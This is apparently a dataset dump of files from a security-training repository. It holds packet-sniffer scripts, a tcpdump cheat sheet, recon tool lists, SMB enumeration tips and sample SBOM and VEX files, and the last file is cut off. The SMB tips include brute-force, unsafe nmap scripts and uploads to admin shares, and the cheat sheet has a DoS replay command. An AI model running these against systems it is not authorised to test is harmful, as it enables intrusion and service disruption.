language
stringlengths
0
24
filename
stringlengths
9
214
code
stringlengths
99
9.93M
Python
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/sniffing_packet_capturing/http_sniffer.py
#!/usr/bin/python from __future__ import print_function import socket s=socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800)) while True: data=s.recvfrom(65535) try: if "HTTP" in data[0][54:]: print("[","="*30,']') raw=data[0][54:] if "\r\n\r\n" in raw: line=raw.split('\r\n\r\n')[0] print("[*] Header Captured ") print(line[line.find('HTTP'):]) else: print(raw) else: #print '[{}]'.format(data) pass except: pass
Python
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/sniffing_packet_capturing/python_sniffer.py
#!/usr/bin/python # Author: Omar Santos @santosomar # version 1.0 # This is a quick demonstration on how to create a # snifffer (packet capture script) using python. ##################################################################### from __future__ import print_function import socket #create an INET, raw socket s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) # receive a packet while True: # print output on terminal print(s.recvfrom(65565))
Markdown
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/sniffing_packet_capturing/tcpdump.md
# Useful `tcpdump` commands ### TCPDUMP Cheat Sheet * [TCPDUMP Cheat Sheet](http://packetlife.net/media/library/12/tcpdump.pdf) is a good resource (I also have a local copy in this repository) ### TCP traffic on port 80-88 `tcpdump -nvvX -sO -i ethO tcp portrange 80-88` ### Capturing traffic to specific IP address excluding specific subnet `tcpdump -I ethO -tttt dst ip and not net 10.10.10.0/24` ### Capturing traffic for a specific host `tcpdump host 10.1.1.1` ### Capturing traffic for a specific subnet `tcpdump net 10.1.1` ### Capturing traffic for a given duration in seconds `dumpcap -I ethO -a duration: sec -w file myfile.pcap` ### Replaying a PCAP `file2cable -i ethO -f file.pcap` ### Replaying packets (to fuzz/DoS) `tcpreplay--topspeed --loop=O --intf=ethO pcap_file_to_replay mbps=10|100|1000
Python
h4cker/python_ruby_and_bash/python_sniffer.py
PLEASE GO UNDER: https://github.com/The-Art-of-Hacking/h4cker/tree/master/programming_and_scripting_for_cybersecurity
Markdown
h4cker/python_ruby_and_bash/README.md
PLEASE GO UNDER: https://github.com/The-Art-of-Hacking/h4cker/tree/master/programming_and_scripting_for_cybersecurity
Markdown
h4cker/recon/README.md
# Active and Passive Reconnaissance Tips and Tools ## Passive Recon ### Website Exploration and "Google Hacking" * censys - https://censys.io * Spyse - https://spyse.com * netcraft - https://searchdns.netcraft.com * Google Hacking Database (GHDB) - https://www.exploit-db.com/google-hacking-database * ExifTool - https://www.sno.phy.queensu.ca/~phil/exiftool * Certficate Search - https://crt.sh/ * Huge TLS/SSL certificate DB with advanced search - https://certdb.com * Google Transparency Report - https://transparencyreport.google.com/https/certificates * SiteDigger - http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx ### Social Media * A tool to scrape LinkedIn: https://github.com/dchrastil/TTSL * cree.py http://ilektrojohn.github.com/creepy ### Whois WHOIS information is based upon a tree hierarchy. ICANN (IANA) is the authoritative registry for all of the TLDs and is a great starting point for all manual WHOIS queries. * ICANN - http://www.icann.org * IANA - http://www.iana.com * NRO - http://www.nro.net * AFRINIC - http://www.afrinic.net * APNIC - http://www.apnic.net * ARIN - http://ws.arin.net * LACNIC - http://www.lacnic.net * RIPE - http://www.ripe.net ## BGP looking glasses * BGP4 - http://www.bgp4.as/looking-glasses * BPG6 - http://lg.he.net/ ## DNS * dnsenum - http://code.google.com/p/dnsenum * dnsmap - http://code.google.com/p/dnsmap * dnsrecon - http://www.darkoperator.com/tools-and-scripts * dnstracer - http://www.mavetju.org/unix/dnstracer.php * dnswalk - http://sourceforge.net/projects/dnswalk ## Dark Web Research * [Search Engines for Academic Research](https://www.itseducation.asia/deep-web.htm) * See additional information under the [OSINT Dark Web OSINT Tools section](https://github.com/The-Art-of-Hacking/h4cker/tree/master/osint#dark-web-osint-tools) ### Other Great Intelligence Gathering Sources and Tools * Resources from Pentest-standard.org - http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Intelligence_Gathering ## Active Recon * [Tons of references to scanners and vulnerability management software for active reconnaissance](http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Vulnerability_Analysis) * [nmap cheat sheet](https://github.com/The-Art-of-Hacking/h4cker/blob/master/cheat_sheets/NMAP_cheat_sheet.md) * nikto * [nuclei](https://github.com/The-Art-of-Hacking/h4cker/blob/master/cheat_sheets/NMAP_cheat_sheet.md) * [OWASP ZAP](https://www.zaproxy.org)
Markdown
h4cker/recon/smb_enumeration_tips.md
## SMB NETBIOS Enumeration Tips ### Tool Tips #### Enum4Linux ``` enum4linux x.x.x.x ``` #### Nmap ``` nmap -v -p 139,445 -oG smb.txt 192.168.88.0-254 ``` #### nbtscan ``` nbtscan -r 192.168.11.0/24 ``` #### nmblookup ``` nmblookup -A target ``` #### smbclient ``` smbclient //192.168.31.147/karen -I 192.168.88.251 ``` #### rpcclient ``` rpcclient -U "" 192.168.88.251 // connect as blank user /nobody ``` #### smbmap ``` smbmap -u "" -p "" -d MYGROUP -H 192.168.88.251 ``` ## Metasploit ### SMB version ``` msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.88.251 RHOSTS => 192.168.31.142 msf auxiliary(scanner/smb/smb_version) > run [*] 192.168.31.142:139 - Host could not be identified: Unix (Samba 2.2.1a) ``` ### SMB brute force ``` use auxiliary/scanner/smb/smb_login ``` ### Existing users ``` msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142 RHOSTS => 192.168.31.142 msf auxiliary(scanner/smb/smb_lookupsid) > run [*] 192.168.31.142:139 - PIPE(LSARPC) LOCAL(MYGROUP - 5-21-4157223341-3243572438-1405127623) DOMAIN(MYGROUP - ) [*] 192.168.31.142:139 - TYPE=0 NAME=Administrator rid=500 ``` ### upload a file smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py" ## NMAP SMB scripts == nmap --script smb-* --script-args=unsafe=1 192.168.10.55 ``` ┌─[omar@websploit]─[~] └──╼ $ ls -lh /usr/share/nmap/scripts/smb* smb-brute.nse smb-enum-domains.nse smb-enum-groups.nse smb-enum-processes.nse smb-enum-sessions.nse smb-enum-shares.nse smb-enum-users.nse smb-flood.nse smb-ls.nse smb-mbenum.nse smb-os-discovery.nse smb-print-text.nse smb-psexec.nse smb-security-mode.nse smb-server-stats.nse smb-system-info.nse smb-vuln-conficker.nse smb-vuln-cve2009-3103.nse smb-vuln-ms06-025.nse smb-vuln-ms07-029.nse smb-vuln-ms08-067.nse smb-vuln-ms10-054.nse smb-vuln-ms10-061.nse smb-vuln-regsvc-dos.nse smbv2-enabled.nse ``` ### mount SMB shares in Linux ``` smbclient -L \\WIN7\ -I 192.168.13.218 smbclient -L \\WIN7\ADMIN$ -I 192.168.13.218 smbclient -L \\WIN7\C$ -I 192.168.13.218 smbclient -L \\WIN7\IPC$ -I 192.168.13.218 smbclient \\192.168.13.236\some-share -o user=root,pass=root,workgroup=BOB ``` ### mount SMB share to a afolder ``` mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP ``` ### mount SMB shares in Windows (via cmd) ``` net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES ```
Markdown
h4cker/reverse_engineering/README.md
# Reverse Engineer References ## Hex Editors * [010 Editor](http://www.sweetscape.com/010editor/) * [Hex Workshop](http://www.hexworkshop.com/) * [HexFiend](http://ridiculousfish.com/hexfiend/) * [Hiew](http://www.hiew.ru/) * [HxD](https://mh-nexus.de/en/hxd/) ## Disassemblers * [Ghidra](https://ghidra-sre.org/) * [Binary Ninja](https://binary.ninja/) * [Capstone](http://www.capstone-engine.org/) * [fREedom](https://github.com/cseagle/fREedom) * [Hopper](http://hopperapp.com/) * [IDA Pro](https://www.hex-rays.com/products/ida/index.shtml) * [JEB](https://www.pnfsoftware.com/jeb2/) * [objdump](http://linux.die.net/man/1/objdump) * [Radare](http://www.radare.org/r/) ## Dynamic Analysis * [Autoruns](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) * [Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) * [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer) * [Process Hacker](https://processhacker.sourceforge.io/) * [Noriben - Portable, Simple, Malware Analysis Sandbox](https://github.com/Rurik/Noriben) * [API Monitor](http://www.rohitab.com/apimonitor) * [INetSim: Internet Services Simulation Suite](http://www.inetsim.org/) * [FakeNet](https://practicalmalwareanalysis.com/fakenet/) * [Volatility Framework](https://github.com/volatilityfoundation/volatility) * [Stardust](https://my.comae.io/login) * [LiME: Linux Memory Extractor](https://github.com/504ensicsLabs/LiME) ## Sandbox and Stuff * [Cuckoo](https://cuckoosandbox.org/) ## Deobfuscation * [Balbuzard](https://bitbucket.org/decalage/balbuzard/wiki/Home) * [de4dot](https://github.com/0xd4d/de4dot) * [ex_pe_xor](ex_pe_xor) * [iheartxor](http://hooked-on-mnemonics.blogspot.com/p/iheartxor.html) * [FLOSS](https://github.com/fireeye/flare-floss) * [NoMoreXOR](https://github.com/hiddenillusion/NoMoreXOR) * [PackerAttacker](https://github.com/BromiumLabs/PackerAttacker) * [unpacker](https://github.com/malwaremusings/unpacker/) * [unxor](https://github.com/tomchop/unxor/) * [VirtualDeobfuscator](https://github.com/jnraber/VirtualDeobfuscator) * [XORBruteForcer](http://eternal-todo.com/var/scripts/xorbruteforcer) * [XORSearch & XORStrings](https://blog.didierstevens.com/programs/xorsearch/) * [xortool](https://github.com/hellman/xortool) ## Awesome Reversing * https://github.com/fdivrp/awesome-reversing - a plethora of references of tools, practice sites, and other reverse engineering information ## Reverse Engineering Tutorials * [Assembly Programming Tutorial](https://www.tutorialspoint.com/assembly_programming/index.htm) * [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) * [Binary Auditing Course](http://www.binary-auditing.com/) * [Corelan Training](https://www.corelan-training.com/) * [Dr. Fu's Malware Analysis](http://fumalwareanalysis.blogspot.sg/p/malware-analysis-tutorials-reverse.html) * [Legend of Random](https://legend.octopuslabs.io/sample-page.html) * [Lenas Reversing for Newbies](https://tuts4you.com/) * [Modern Binary Exploitation](http://security.cs.rpi.edu/courses/binexp-spring2015/) * [Offensive and Defensive Android Reversing](https://github.com/rednaga/training/raw/master/DEFCON23/O%26D%20-%20Android%20Reverse%20Engineering.pdf) * [Offensive Security](https://www.offensive-security.com/information-security-training/) * [Open Security Training](http://opensecuritytraining.info/Training.html) * [REcon Training](https://recon.cx/2015/training.html) * [Reverse Engineering Malware 101](https://securedorg.github.io/RE101/) * [RPISEC Malware Course](https://github.com/RPISEC/Malware) * [TiGa's Video Tutorials](http://www.woodmann.com/TiGa/) * [Malware Traffic Analysis](http://www.malware-traffic-analysis.net) ## Other Tools ### Reverse Engineering Tools * [Interactive Disassembler (IDA Pro)](https://www.hex-rays.com/products/ida/) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware.shtml). * [WDK/WinDbg](https://msdn.microsoft.com/en-us/windows/hardware/hh852365.aspx) - Windows Driver Kit and WinDbg. * [OllyDbg](http://www.ollydbg.de/) - x86 debugger for Windows binaries that emphasizes binary code analysis. * [Radare2](http://rada.re/r/index.html) - Open source, crossplatform reverse engineering framework. * [x64dbg](http://x64dbg.com/) - Open source x64/x32 debugger for windows. * [Immunity Debugger](http://debugger.immunityinc.com/) - Powerful way to write exploits and analyze malware. * [Evan's Debugger](http://www.codef00.com/projects#debugger) - OllyDbg-like debugger for GNU/Linux. * [Medusa](https://github.com/wisk/medusa) - Open source, cross-platform interactive disassembler. * [plasma](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code. * [peda](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB. * [dnSpy](https://github.com/0xd4d/dnSpy) - Tool to reverse engineer .NET assemblies. * [binwalk](https://github.com/devttys0/binwalk) - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images. * [PyREBox](https://github.com/Cisco-Talos/pyrebox) - Python scriptable Reverse Engineering sandbox by Cisco-Talos. * [Voltron](https://github.com/snare/voltron) - Extensible debugger UI toolkit written in Python. * [Capstone](http://www.capstone-engine.org/) - Lightweight multi-platform, multi-architecture disassembly framework. * [rVMI](https://github.com/fireeye/rVMI) - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool. * [Frida](https://www.frida.re/) - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. ## Reverse Engineering CTF-like Exercises - https://microcorruption.com/ - Given a debugger and a device, find an input that unlocks it. Solve the level with that input. - http://reversing.kr/challenge.php - This site tests your ability to Cracking & Reverse Code Engineering. - https://www.malwaretech.com/beginner-malware-reversing-challenges - The purpose of these challenges is to familiarize beginners with common malware techniques. - https://crackmes.one/ - This is a simple place where you can download crackmes to improve your reverse engineering skills. - https://challenges.re/ - Well, "challenges" is a loud word, these are rather just exercises for RE. - https://reverse.put.as/crackmes/ - A collection of crackmes for OS X. Send them to me if you have new ones to add! - https://join.eset.com/en/challenges - If you want to join the team that every day faces global cyber-threats, uncover a hidden puzzle in the crackme program and prove us your potential. - http://flare-on.com/ - FireEye's challenge RE. - https://ropemporium.com/ - Learn return-oriented programming through a series of challenges designed to teach ROP techniques in isolation, with minimal reverse-engineering and bug-hunting.
JSON
h4cker/sbom/csaf_vex_example.json
{ "document": { "category": "vex", "csaf_version": "2.0", "notes": [ { "category": "summary", "text": "Vulnerability information for SBOM ACME-INFUSION-1.0-SBOM-DRAFT ", "title": "Summary" }, { "category": "legal_disclaimer", "text": "THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK.", "title": "Legal Disclaimer" } ], "publisher": { "category": "coordinator", "contact_details": "Email: [email protected], Phone: +1412 268 5800", "issuing_authority": "CERT/CC under DHS/CISA https://www.cisa.gov/cybersecurity also see https://kb.cert.org/ ", "name": "CERT/CC", "namespace": "https://kb.cert.org/" }, "references": [ { "url": "https://vuls.cert.org/confluence/display/Wiki/Vulnerability+Disclosure+Policy", "summary": "CERT/CC vulnerability disclosure policy" } ], "title": "SBOM Reference Advisory for ACME-INFUSION-1.0-SBOM-DRAFT", "tracking": { "current_release_date": "2021-08-22T01:36:56.415", "generator": { "engine": { "name": "SwiftBOM", "version": "5.2.5" } }, "id": "SwiftBOM-CSAF-ACME-INFUSION-1.0-SBOM-DRAFT", "initial_release_date": "2021-08-22T01:36:56.415", "revision_history": [ { "date": "2021-08-22T01:36:56.415", "number": "1.0.0", "summary": "Draft for demo purposes" } ], "status": "draft", "version": "1.0.0" } }, "vulnerabilities": [ { "cve": "CVE-2019-2697", "product_status": { "known_affected": [ "CSAFPID-cd101e21-2058-4f30-47e1-3a00c665a26e", "CSAFPID-5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "CSAFPID-9c0531c5-2779-ddf0-4200-eb43fee967e9", "CSAFPID-a0bb435c-24c4-9dce-8d6d-1322fa07021c" ] }, "notes": [ { "category": "summary", "text": "Vulnerability in the Java SE component of Oracle Java SE (subcomponent: 2D). Supported versions that are affected are Java SE: 7u211 and 8u202. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)." } ], "remediations": [ { "category": "vendor_fix", "product_ids": [ "CSAFPID-cd101e21-2058-4f30-47e1-3a00c665a26e", "CSAFPID-5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "CSAFPID-9c0531c5-2779-ddf0-4200-eb43fee967e9", "CSAFPID-a0bb435c-24c4-9dce-8d6d-1322fa07021c" ], "details": "Please update to the latest version of the software provided by the Vendor." } ], "scores": [ { "products": [ "CSAFPID-cd101e21-2058-4f30-47e1-3a00c665a26e", "CSAFPID-5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "CSAFPID-9c0531c5-2779-ddf0-4200-eb43fee967e9", "CSAFPID-a0bb435c-24c4-9dce-8d6d-1322fa07021c" ], "cvss_v3": { "version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH" } } ] } ], "product_tree": { "branches": [ { "category": "vendor", "name": "Oracle", "branches": [ { "category": "product_name", "name": "Java 8", "branches": [ { "category": "product_version", "name": "v1.8", "product": { "product_id": "CSAFPID-cd101e21-2058-4f30-47e1-3a00c665a26e", "name": "Oracle Java 8 v1.8", "product_identification_helper": { "purl": "pkg:supplier/undefined/[email protected]" } } } ] } ] }, { "category": "vendor", "name": "Apache Foundation", "branches": [ { "category": "product_name", "name": "Tomcat 9", "branches": [ { "category": "product_version", "name": "v9.037", "product": { "product_id": "CSAFPID-5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "name": "Apache Foundation Tomcat 9 v9.037", "product_identification_helper": { "purl": "pkg:supplier/undefined/[email protected]" } } } ] } ] }, { "category": "vendor", "name": "Apache Foundation", "branches": [ { "category": "product_name", "name": "Spring Framework", "branches": [ { "category": "product_version", "name": "v4.7", "product": { "product_id": "CSAFPID-9c0531c5-2779-ddf0-4200-eb43fee967e9", "name": "Apache Foundation Spring Framework v4.7", "product_identification_helper": { "purl": "pkg:supplier/undefined/[email protected]" } } } ] } ] }, { "category": "vendor", "name": "ACME", "branches": [ { "category": "product_name", "name": "INFUSION", "branches": [ { "category": "product_version", "name": "1.0", "product": { "product_id": "CSAFPID-a0bb435c-24c4-9dce-8d6d-1322fa07021c", "name": "ACME INFUSION 1.0", "product_identification_helper": { "purl": "pkg:supplier/undefined/[email protected]" } } } ] } ] } ] } }
JSON
h4cker/sbom/cyclone-dx_example.json
{ "bomFormat": "CycloneDX", "specVersion": "1.2", "serialNumber": "urn:uuid:5086ac52-50b2-f7c9-69db-207de37cde08", "version": 1, "metadata": { "timestamp": "2021-08-22T05:36:56Z", "authors": [ { "name": "ACME-Hospital-Division()" } ], "component": { "type": "application", "bom-ref": "a0bb435c-24c4-9dce-8d6d-1322fa07021c", "name": "INFUSION", "purl": "pkg:supplier/ACME/[email protected]", "supplier": { "name": "ACME" }, "version": "1.0", "hashes": [ { "alg": "SHA256", "content": "c76bcb7f54e0485d04f939f397259118d0e9eea4de47240b3a73ed4d7d248e97" } ] }, "manufacture": { "name": "ACME" } }, "components": [ { "type": "library", "bom-ref": "78a6e7eb-fd82-28bd-4451-dd953d62f30a", "name": "Windows Embedded Standard 7", "purl": "pkg:supplier/Microsoft/Windows%20Embedded%20Standard%[email protected]", "publisher": "Microsoft", "version": "6.1.7601", "hashes": [ { "alg": "SHA256", "content": "89b6e837e94330999d4221be9db9f17a7f51d1bfad360a75ed8cfd71a2e1e24d" } ] }, { "type": "library", "bom-ref": "5fd67cd3-12db-72b7-ae71-33aabfded828", "name": "Windows Embedded Standard 7 with SP1 patches", "purl": "pkg:supplier/Microsoft/Windows%20Embedded%20Standard%207%20with%20SP1%[email protected]", "publisher": "Microsoft", "version": "3.0", "hashes": [ { "alg": "SHA256", "content": "e4386ef0d2f144b1275544eee3914a81d59e4c75930a2174654c70edd71d55ea" } ] }, { "type": "library", "bom-ref": "88778c2b-3e43-fece-2e8d-e87672706ac6", "name": "SQL 2005 Express", "purl": "pkg:supplier/Microsoft/SQL%202005%[email protected],SP4", "publisher": "Microsoft", "version": "9.00.5000.00,SP4", "hashes": [ { "alg": "SHA256", "content": "369a2d0fc60383d8a03eac3464618d46868cefe89913a4ddf3822c0e69ebf7ff" } ] }, { "type": "library", "bom-ref": "70e06f6c-ea5d-4470-9ea6-43064533a00f", "name": ".Net Frame Work", "purl": "pkg:supplier/Microsoft/.Net%20Frame%[email protected],SP2", "publisher": "Microsoft", "version": "V2.1.21022.8,SP2", "hashes": [ { "alg": "SHA256", "content": "924a2321096a5d46146f007038960df62bd8b4455c17d5e081d4b852c7743899" } ] }, { "type": "library", "bom-ref": "cd101e21-2058-4f30-47e1-3a00c665a26e", "name": "Java 8", "purl": "pkg:supplier/Oracle/Java%[email protected]", "publisher": "Oracle", "version": "v1.8", "hashes": [ { "alg": "SHA256", "content": "2617534e463dc57d91a92a075b507eea972e455193e83db25be480e5e1cc0e40" } ] }, { "type": "library", "bom-ref": "5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "name": "Tomcat 9", "purl": "pkg:supplier/Apache%20Foundation/Tomcat%[email protected]", "publisher": "Apache Foundation", "version": "v9.037", "hashes": [ { "alg": "SHA256", "content": "8c1f9ad48e6a91b648a3ff3cab2120eea966f6e84b6c0bc069fbafe2fbb77e5b" } ] }, { "type": "library", "bom-ref": "9c0531c5-2779-ddf0-4200-eb43fee967e9", "name": "Spring Framework", "purl": "pkg:supplier/Apache%20Foundation/Spring%[email protected]", "publisher": "Apache Foundation", "version": "v4.7", "hashes": [ { "alg": "SHA256", "content": "66ad8bd2c06338b533b15f8171709407ad6aea24d87a5ae0d0eb3d37e78df9c9" } ] } ], "dependencies": [ { "ref": "a0bb435c-24c4-9dce-8d6d-1322fa07021c", "dependsOn": [ "78a6e7eb-fd82-28bd-4451-dd953d62f30a", "5fd67cd3-12db-72b7-ae71-33aabfded828", "88778c2b-3e43-fece-2e8d-e87672706ac6", "cd101e21-2058-4f30-47e1-3a00c665a26e" ] }, { "ref": "78a6e7eb-fd82-28bd-4451-dd953d62f30a", "dependsOn": [ "70e06f6c-ea5d-4470-9ea6-43064533a00f" ] }, { "ref": "cd101e21-2058-4f30-47e1-3a00c665a26e", "dependsOn": [ "5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "9c0531c5-2779-ddf0-4200-eb43fee967e9" ] } ] }
JSON
h4cker/sbom/spdx_example.json
{ "SPDXID": "SPDXRef-DOCUMENT", "spdxVersion": "SPDX-2.1", "creationInfo": { "comment": "Draft ACME INFUSION PoC II SBOM document in SPDX format. Unofficial content for demonstration purposes only", "created": "2021-08-22T05:36:56Z", "creators": [ "Organization: ACME-Hospital-Division()" ] }, "name": "ACME-INFUSION-1.0-SBOM-DRAFT", "dataLicense": "CC0-1.0", "documentNamespace": "http://www.hospitalproducts.acme", "documentDescribes": [ "SPDXRef-a0bb435c-24c4-9dce-8d6d-1322fa07021c" ], "packages": [ { "SPDXID": "SPDXRef-a0bb435c-24c4-9dce-8d6d-1322fa07021c", "comment": "PURL is pkg:supplier/ACME/[email protected] ", "copyrightText": "NOASSERTION", "downloadLocation": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:supplier/ACME/[email protected]", "referenceType": "purl" } ], "filesAnalyzed": true, "hasFiles": [ "SPDXRef-File-a0bb435c-24c4-9dce-8d6d-1322fa07021c" ], "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "name": "INFUSION", "supplier": "Organization: ACME", "versionInfo": "1.0" }, { "SPDXID": "SPDXRef-78a6e7eb-fd82-28bd-4451-dd953d62f30a", "comment": "PURL is pkg:supplier/Microsoft/Windows%20Embedded%20Standard%[email protected] ", "copyrightText": "NOASSERTION", "downloadLocation": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:supplier/Microsoft/Windows%20Embedded%20Standard%[email protected]", "referenceType": "purl" } ], "filesAnalyzed": true, "hasFiles": [ "SPDXRef-File-78a6e7eb-fd82-28bd-4451-dd953d62f30a" ], "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "name": "Windows Embedded Standard 7", "supplier": "Organization: Microsoft", "versionInfo": "6.1.7601" }, { "SPDXID": "SPDXRef-5fd67cd3-12db-72b7-ae71-33aabfded828", "comment": "PURL is pkg:supplier/Microsoft/Windows%20Embedded%20Standard%207%20with%20SP1%[email protected] ", "copyrightText": "NOASSERTION", "downloadLocation": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:supplier/Microsoft/Windows%20Embedded%20Standard%207%20with%20SP1%[email protected]", "referenceType": "purl" } ], "filesAnalyzed": true, "hasFiles": [ "SPDXRef-File-5fd67cd3-12db-72b7-ae71-33aabfded828" ], "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "name": "Windows Embedded Standard 7 with SP1 patches", "supplier": "Organization: Microsoft", "versionInfo": "3.0" }, { "SPDXID": "SPDXRef-88778c2b-3e43-fece-2e8d-e87672706ac6", "comment": "PURL is pkg:supplier/Microsoft/SQL%202005%[email protected],SP4 ", "copyrightText": "NOASSERTION", "downloadLocation": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:supplier/Microsoft/SQL%202005%[email protected],SP4", "referenceType": "purl" } ], "filesAnalyzed": true, "hasFiles": [ "SPDXRef-File-88778c2b-3e43-fece-2e8d-e87672706ac6" ], "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "name": "SQL 2005 Express", "supplier": "Organization: Microsoft", "versionInfo": "9.00.5000.00,SP4" }, { "SPDXID": "SPDXRef-70e06f6c-ea5d-4470-9ea6-43064533a00f", "comment": "PURL is pkg:supplier/Microsoft/.Net%20Frame%[email protected],SP2 ", "copyrightText": "NOASSERTION", "downloadLocation": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:supplier/Microsoft/.Net%20Frame%[email protected],SP2", "referenceType": "purl" } ], "filesAnalyzed": true, "hasFiles": [ "SPDXRef-File-70e06f6c-ea5d-4470-9ea6-43064533a00f" ], "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "name": ".Net Frame Work", "supplier": "Organization: Microsoft", "versionInfo": "V2.1.21022.8,SP2" }, { "SPDXID": "SPDXRef-cd101e21-2058-4f30-47e1-3a00c665a26e", "comment": "PURL is pkg:supplier/Oracle/Java%[email protected] ", "copyrightText": "NOASSERTION", "downloadLocation": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:supplier/Oracle/Java%[email protected]", "referenceType": "purl" } ], "filesAnalyzed": true, "hasFiles": [ "SPDXRef-File-cd101e21-2058-4f30-47e1-3a00c665a26e" ], "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "name": "Java 8", "supplier": "Organization: Oracle", "versionInfo": "v1.8" }, { "SPDXID": "SPDXRef-5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "comment": "PURL is pkg:supplier/Apache%20Foundation/Tomcat%[email protected] ", "copyrightText": "NOASSERTION", "downloadLocation": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:supplier/Apache%20Foundation/Tomcat%[email protected]", "referenceType": "purl" } ], "filesAnalyzed": true, "hasFiles": [ "SPDXRef-File-5803cc4b-c10b-5c77-8e0e-f081c245f1c5" ], "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "name": "Tomcat 9", "supplier": "Organization: Apache Foundation", "versionInfo": "v9.037" }, { "SPDXID": "SPDXRef-9c0531c5-2779-ddf0-4200-eb43fee967e9", "comment": "PURL is pkg:supplier/Apache%20Foundation/Spring%[email protected] ", "copyrightText": "NOASSERTION", "downloadLocation": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE_MANAGER", "referenceLocator": "pkg:supplier/Apache%20Foundation/Spring%[email protected]", "referenceType": "purl" } ], "filesAnalyzed": true, "hasFiles": [ "SPDXRef-File-9c0531c5-2779-ddf0-4200-eb43fee967e9" ], "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "name": "Spring Framework", "supplier": "Organization: Apache Foundation", "versionInfo": "v4.7" } ], "files": [ { "SPDXID": "SPDXRef-File-a0bb435c-24c4-9dce-8d6d-1322fa07021c", "checksums": [ { "algorithm": "SHA256", "checksumValue": "c76bcb7f54e0485d04f939f397259118d0e9eea4de47240b3a73ed4d7d248e97" } ], "fileName": "INFUSION.iso" }, { "SPDXID": "SPDXRef-File-78a6e7eb-fd82-28bd-4451-dd953d62f30a", "checksums": [ { "algorithm": "SHA256", "checksumValue": "89b6e837e94330999d4221be9db9f17a7f51d1bfad360a75ed8cfd71a2e1e24d" } ], "fileName": "Windows7-Embedded.pkg" }, { "SPDXID": "SPDXRef-File-5fd67cd3-12db-72b7-ae71-33aabfded828", "checksums": [ { "algorithm": "SHA256", "checksumValue": "e4386ef0d2f144b1275544eee3914a81d59e4c75930a2174654c70edd71d55ea" } ], "fileName": "MS-Windows-7-tr.iso" }, 